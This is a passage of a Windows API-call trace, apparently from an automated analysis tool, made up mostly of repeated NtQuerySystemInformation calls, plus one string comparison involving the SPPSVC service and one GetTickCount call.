NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x28, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f420, Length=0x28, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4a0, Length=0x28, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4a0, Length=0x28, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f400, Length=0x20, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f380, Length=0x20, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f380, Length=0x20, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f380, Length=0x20, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f400, Length=0x20, ResultLength=0x0) [0238.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f6a0, Length=0x58, ResultLength=0x0) [0238.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f610, Length=0x28, ResultLength=0x0) [0238.028] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f6a0, Length=0x58, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f6a0, Length=0x58, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f6a0, Length=0x58, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3c0, Length=0x28, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3c0, Length=0x28, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3c0, Length=0x28, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f430, Length=0x28, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4b0, Length=0x28, ResultLength=0x0) [0238.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4b0, Length=0x28, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f320, Length=0x20, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2a0, Length=0x20, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2a0, Length=0x20, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2a0, Length=0x20, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f4f0, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f410, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f410, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x20, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f580, Length=0x38, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f410, Length=0x20, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3a0, Length=0x20, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3a0, Length=0x20, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f6a0, Length=0x58, ResultLength=0x0) [0238.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f5e0, Length=0x20, ResultLength=0x0) [0238.039] GetTickCount () returned 0x117bd57 [0238.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f498, Length=0x58, ResultLength=0x0) [0238.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x38, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x28, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x28, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x28, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1e0, Length=0x28, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f250, Length=0x28, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x38, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x28, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x28, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x38, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x20, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x20, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x20, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x20, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3b0, Length=0x38, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f230, Length=0x20, ResultLength=0x0) [0238.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1c0, Length=0x20, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1c0, Length=0x20, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f498, Length=0x58, ResultLength=0x0) [0238.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x28, ResultLength=0x0) [0238.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x28, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x28, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x28, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f220, Length=0x28, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2a0, Length=0x28, ResultLength=0x0) [0238.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2a0, Length=0x28, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f370, Length=0x38, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x20, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f090, Length=0x20, ResultLength=0x0) [0238.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.115] 